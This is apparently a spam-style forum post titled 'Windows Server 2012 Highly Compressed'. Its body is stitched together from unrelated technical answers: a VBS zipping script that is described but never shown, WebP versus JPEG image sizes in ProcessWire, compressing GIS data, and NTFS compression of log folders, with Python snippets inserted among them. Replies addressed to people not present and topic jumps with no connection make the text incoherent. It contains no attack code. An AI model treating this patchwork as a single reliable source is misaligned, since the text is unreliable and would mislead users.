Re: Windows Server 2012 Highly Compressed

Ania Cozzolino

Jul 11, 2024, 6:41:26 PM
to pothankwardtes

I've combined this script from several different sources to suit my needs better. Copy and paste the script into a file with the extension ".vbs". The script was originally made for Windows XP, but it also works in Windows 7 x64 Ultimate. No guarantees that Windows will keep the various Shell objects it uses around.

(Works on NTFS volumes.) The file size after compression still displays the same in a CLI dir listing or in the GUI file properties, but the disk space occupied is 6-8 times less. Already-compressed binary files won't benefit much.

For the ZIP file format from PKWARE, the compression rate is about 4 times higher than compact's (from testing on Win 10), and ZIP incorporates a range of compression algorithms such as Deflate, BZip2, LZW, LZMA, LZ77, PPMd, etc.
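The difference between those algorithms is easy to see in practice. This is a small stand-in sketch using Python's standard `zipfile` module (the file name and sample data are made up); it writes the same highly repetitive text with several of the methods mentioned above and compares the resulting archive sizes in memory:

```python
import io
import zipfile

# Highly repetitive text, similar to a log file -- an easy target.
data = b"highly compressible plain text line\n" * 5000

sizes = {}
for name, method in [
    ("stored", zipfile.ZIP_STORED),      # no compression at all
    ("deflate", zipfile.ZIP_DEFLATED),   # classic ZIP / gzip algorithm
    ("bzip2", zipfile.ZIP_BZIP2),
    ("lzma", zipfile.ZIP_LZMA),
]:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=method) as zf:
        zf.writestr("data.txt", data)
    sizes[name] = len(buf.getvalue())

print(sizes)
```

Repetitive text shrinks dramatically with any of these; already-compressed binary input would not, which matches the note above about NTFS compression on binaries.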

There is also a way to unzip the files via the command line, which I found as well. One approach just opens an Explorer window showing the contents of the zipped file. Some of these also use Java, which isn't native to Windows but is so common that it nearly seems so.
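For extraction without any Explorer window or Java dependency, Python's standard library works anywhere Python is installed; the same module even has a built-in command-line mode (`python -m zipfile -e archive.zip out/`). A minimal sketch, with throwaway file names:

```python
import pathlib
import tempfile
import zipfile

# Build a small throwaway archive, then extract it entirely from code.
tmpdir = pathlib.Path(tempfile.mkdtemp())
archive = tmpdir / "sample.zip"
with zipfile.ZipFile(archive, "w") as zf:
    zf.writestr("readme.txt", "hello")

out = tmpdir / "out"
with zipfile.ZipFile(archive) as zf:
    zf.extractall(out)  # command-line equivalent: python -m zipfile -e sample.zip out/

extracted = (out / "readme.txt").read_text()
print(extracted)
```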

Using the CopyHere() method in VBS introduces several issues. One is that the method returns immediately while the copy process starts in the background, so multiple CopyHere() calls will interfere with each other and the ZIP won't be created correctly. A wait loop is needed to fix that. My wait loop is based on an answer to a similar issue posted here.
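The wait-loop pattern itself is language-agnostic: poll the archive until the expected item count appears, with a timeout so a failed copy can't hang the script forever. A sketch of that pattern in Python (the background thread here merely stands in for the asynchronous CopyHere() copy; function and file names are made up):

```python
import os
import tempfile
import threading
import time
import zipfile

def wait_for_zip(path, expected_count, timeout=10.0, interval=0.05):
    """Poll an archive until it holds expected_count members, or time out."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            with zipfile.ZipFile(path) as zf:
                if len(zf.namelist()) >= expected_count:
                    return True
        except (OSError, zipfile.BadZipFile):
            pass  # archive missing or still being written -- keep waiting
        time.sleep(interval)
    return False

# Demo: a background thread plays the role of the asynchronous copy.
zip_path = os.path.join(tempfile.mkdtemp(), "demo.zip")

def background_copy():
    time.sleep(0.2)  # the "copy" takes a while to finish
    with zipfile.ZipFile(zip_path, "w") as zf:
        zf.writestr("file.txt", "payload")

threading.Thread(target=background_copy).start()
ok = wait_for_zip(zip_path, expected_count=1)
```

The key design point carried over from the VBS discussion: never issue the next copy (or read the archive) until the previous item has actually appeared.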

Here is an updated version which fixes the "Object required" error reported by pihentagy. It's a timing issue: on fast machines the script runs before the newly created ZIP file shows up in the Items collection.

@rash Besides file size, how does the visual quality of both images compare? Do the WebP images look better, worse, or the same as the JPEG files? If you have a slightly larger file size for a much better image, that might still be a good trade-off.

In fact, you'll want to generate multiple variants in different resolutions for different screen sizes. See my tutorial on using responsive images in ProcessWire for details. That one only talks about JPG, but you can use a <picture> element with two <source> elements, one for WebP and one for JPEG.

Meanwhile I did a bit more testing and found a clear correlation with the JPG compression rate. In Photoshop, a quality setting of 70 (out of 100) or better leads to fairly or even much smaller WebPs, while the saving shrinks at lower quality settings until, at approximately 60, the WebPs actually come out bigger. (The Photoshop value 70 seems to correspond to 65 in Lightroom, a bit more than 80 in Affinity Photo, and something around 90 in Pixelmator Pro. The "good" JPGs on server 1 were produced by Lightroom at setting 70 and therefore match the pattern.)

It doesn't matter how much you shrink your source image before you upload it, because every image manipulation requires loading the image COMPLETELY UNCOMPRESSED into memory. That means: whether you upload a 1000 x 600 px image at the lowest quality and highest compression (e.g. file size 10 KB), OR the exact same image at highest quality with no or minimal compression (file size 2 MB), both result in the exact same in-memory image: 1000 x 600 x 8 x 3 bits for sRGB images. So the only difference is the resulting quality of any variation image. I highly advise using one of two possible strategies for images in PW (or probably any other CMS, too), depending on your use case:
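The arithmetic behind that claim is worth spelling out: the decoded footprint depends only on pixel dimensions and channel depth, never on the on-disk file size. Using the paragraph's example image:

```python
# Decoded size = width x height x channels, at 8 bits (1 byte) per channel.
# The on-disk file size (10 KB or 2 MB) plays no role here.
width, height, channels = 1000, 600, 3  # the example sRGB image

uncompressed_bytes = width * height * channels
print(uncompressed_bytes)  # 1800000 bytes, roughly 1.7 MiB in memory
```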

B) If you want to create further variations from your uploaded image, then it serves as a master image that itself should NEVER be displayed on the front end. In this case the best results in all categories can only be achieved by uploading the highest possible quality (100%, or quality 12 in Photoshop). This is best because compressing the master only saves upload bandwidth/time and disk space, while also costing visual quality. And, what is real too: variations created from a 100% quality master come out with a SMALLER file size than the exact same variations created from a 70% quality master. Explanation: lossy image compression adds visual artefacts, which increases the total number of distinct colors compared to the original image. When the file is (re)loaded into memory for further manipulation / resizing, the compression algorithm has to deal with MORE individual colors than before, and therefore the result has a larger file size (and lower visual quality).

Your real compression performance will probably depend a lot on the data you are putting in. Is it all geometries? If you have a lot of non-spatial data (or a lot of text attributes for spatial points), then it doesn't really matter what you do to the geometries - you need to find some way to compress that data instead.

As others have said, I think you are going to struggle to find a format that meets your compression requirements. You would have to create your own custom format, which, given your requirement to use commercial software, is not going to be viable.

I think you need to possibly first consider how you can make your data models more efficient, then look at the compression aspects. For example, do you have a lot of repetition of geometry? You could then have a base set of geometry layers with unique IDs and then separate attribute data sets that reference the geometry by ID - that way you can have multiple views of the same geometry serving specific functions. Most decent software packages will then allow you to create joins or relates in order to create the unified view for a layer.
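The shared-geometry idea can be sketched in a few lines. This is a hypothetical illustration only (all table and field names are made up): one geometry table keyed by ID, separate attribute tables referencing it, and a join that produces the unified view a GIS package would build for a layer:

```python
# One geometry table keyed by ID -- each outline is stored exactly once.
geometries = {
    "g1": [(0, 0), (0, 1), (1, 1), (1, 0)],  # a shared parcel outline
}

# Separate attribute data sets that reference geometry by ID.
zoning = [{"geom_id": "g1", "zone": "residential"}]
taxes = [{"geom_id": "g1", "rate": 1.2}]

def joined(attribute_rows):
    """Emulate a join/relate: attach the shared geometry to each row."""
    return [
        {**row, "geometry": geometries[row["geom_id"]]}
        for row in attribute_rows
    ]

# Two "views" of the same geometry serving different functions.
zoning_view = joined(zoning)
tax_view = joined(taxes)
```

The saving comes from storing each geometry once, however many attribute views reference it.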

GML is a good example of a format that supports this kind of relational data model, though, being a verbose format, file sizes will be large. You can compress GML using gzip and can potentially get a 20:1 ratio, but then you are relying on the software being able to read compressed GML.
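You can sanity-check that kind of ratio yourself. The snippet below gzips a batch of made-up GML-style point features (the markup repeats, the coordinate values vary); real GML with richer, more varied attributes will compress less well, so treat 20:1 as an upper end for very repetitive data:

```python
import gzip

# 2000 point features: tags repeat verbatim, coordinates differ per feature.
features = "".join(
    f'<gml:featureMember><gml:Point srsName="EPSG:4326">'
    f"<gml:coordinates>{i * 0.001:.3f},{i * 0.002:.3f}</gml:coordinates>"
    f"</gml:Point></gml:featureMember>\n"
    for i in range(2000)
).encode()

packed = gzip.compress(features)
ratio = len(features) / len(packed)
print(f"{len(features)} -> {len(packed)} bytes ({ratio:.1f}:1)")
```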

Regardless, I would urge you to first look at your data models and see where there could be savings to be had. FME from Safe Software is your best bet if you need to start manipulating your data models.

To achieve that sort of ratio, you could use some sort of lossy compression, but I don't know of anything that uses it, and although I have a couple of ideas on how one might implement it, it would be far from standard. It would be much much cheaper to kit your server out with a 1TB disk than to spend time and money developing a custom solution.

You are also confusing data storage with data representation. Your 4th point mentions being able to view the data at different scales, but this is a function of your renderer, not the format per se. Again, a hypothetical lossily compressed file could store data at various resolutions in a sort of LoD structure, but that is likely to increase data size if anything.

If your data is to be on a server somewhere accessible by mobile applications, you're far better off using existing tools that have been designed for the purpose. A WFS server (such as GeoServer or MapServer) is ideally suited to this sort of application. The client makes a request for data of a specific area, normally that covered by the screen, and the WFS sends vector data for just that area, so all the heavy lifting is done by the server. It's then up to the application to render that data. An alternative would be to use the WMS features of MapServer and GeoServer, in which all the rendering is done by the server, and then it sends an image tile to the client. This enables features such as server-side caching of tiles, as well as scale-dependent rendering, with the minimum of work by you. They both read myriad formats, so you can author your data exactly how you like, and store it where you like, and they do all the cool stuff. Quantum GIS also has a WMS server, so you can author and serve data all in the same application.
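A WFS request of the kind described is just an HTTP GET with a bounding box. A minimal sketch of building one (the host and layer name are made up; the parameter names follow the standard WFS GetFeature convention):

```python
from urllib.parse import urlencode

# Hypothetical GeoServer endpoint -- replace with your own server and layer.
base_url = "https://example.com/geoserver/wfs"
params = {
    "service": "WFS",
    "version": "1.1.0",
    "request": "GetFeature",
    "typeName": "topp:roads",
    # Only the area currently on screen -- the server does the heavy lifting.
    "bbox": "-1.0,50.0,0.0,51.0,EPSG:4326",
}

request_url = base_url + "?" + urlencode(params)
print(request_url)
```

The client repeats this with a new bbox whenever the view changes, so it never has to hold (or ship) the whole data set.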

We have a custom Windows Service in our production environment that for auditing and diagnostic reasons generates log files in the file system. The log files are quite verbose (by necessity) and produce about 100 MB of output daily. The log contents must be retained for a 12-month period, but are highly compressible.
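How compressible, roughly? NTFS folder compression uses its own algorithm (LZNT1), but gzip makes a reasonable stand-in for estimating what repetitive audit text will yield. A sketch with made-up log lines in the style described (timestamps and IDs vary, the wording repeats):

```python
import gzip

# Simulate a day of verbose audit output: the template repeats on every
# line, only the millisecond counter and request id change.
line = "2024-07-11 18:41:26.%03d INFO AuditService request id=%06d status=OK\n"
day_log = "".join(line % (i % 1000, i) for i in range(20000)).encode()

packed = gzip.compress(day_log, compresslevel=6)
ratio = len(day_log) / len(packed)
print(f"{len(day_log)} -> {len(packed)} bytes ({ratio:.0f}:1)")
```

Running something like this on a sample of your real logs is a cheap way to decide whether flipping the NTFS compression flag is worth it.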

Are there any potential pitfalls or problems that we may encounter by doing this? Are there any performance, compatibility, or stability issues to consider? If there are, how can we determine whether this is a good idea for us?

I've personally done this on the one Windows server I was in charge of. I think it's a good idea. As you mentioned, the repetitive plain text in log files compresses VERY well. The overhead involved with compression seemed pretty small. I used it for firewall logs, and easily dumped out 100 MB+ per day (although I had it broken into 20 MB files). Unless your CPU is pegged to begin with, I don't think this would be a problem. You'll essentially trade a little bit of CPU power for a great deal of disk space. Sometimes that's an extremely good tradeoff. Other times, not so much.

Obviously, testing is a good idea. But I didn't run into too many troubles. Just be advised the compression isn't transferable, like an old-fashioned zip file. So if you move these files via FTP/CIFS/etc., you're moving the uncompressed amount. If you copy them outside of the compressed folder, you're moving the uncompressed amount. If you use backup software, you're backing up the uncompressed amount. Etc.

Might be worth noting there is an initial compression pass when you actually flip the flag for the folder. So you might want to compress a subset at a time, so you don't bring your server to its knees while it compresses your logs for an hour. This may be significant depending on how much log info you have and how important your application is. But all that being said, you can always reverse the process and uncompress the directory just as easily. So if you find performance is too crappy, you can flip it back.
